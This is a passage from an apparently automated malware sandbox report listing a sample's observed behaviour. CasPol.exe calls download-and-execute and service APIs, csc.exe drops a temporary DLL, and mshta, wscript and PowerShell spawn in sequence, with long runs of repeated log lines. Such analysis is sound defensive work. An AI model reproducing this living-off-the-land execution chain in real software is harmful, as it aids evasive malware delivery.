                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_042413CC push ebx; iretd 8_2_042413DA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434006 push ecx; ret 12_2_00434019
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004567F0 push eax; ret 12_2_0045680E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0045B9DD push esi; ret 12_2_0045B9E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00455EBF push ecx; ret 12_2_00455ED2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW,12_2_00406128
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BD4

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCF3
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
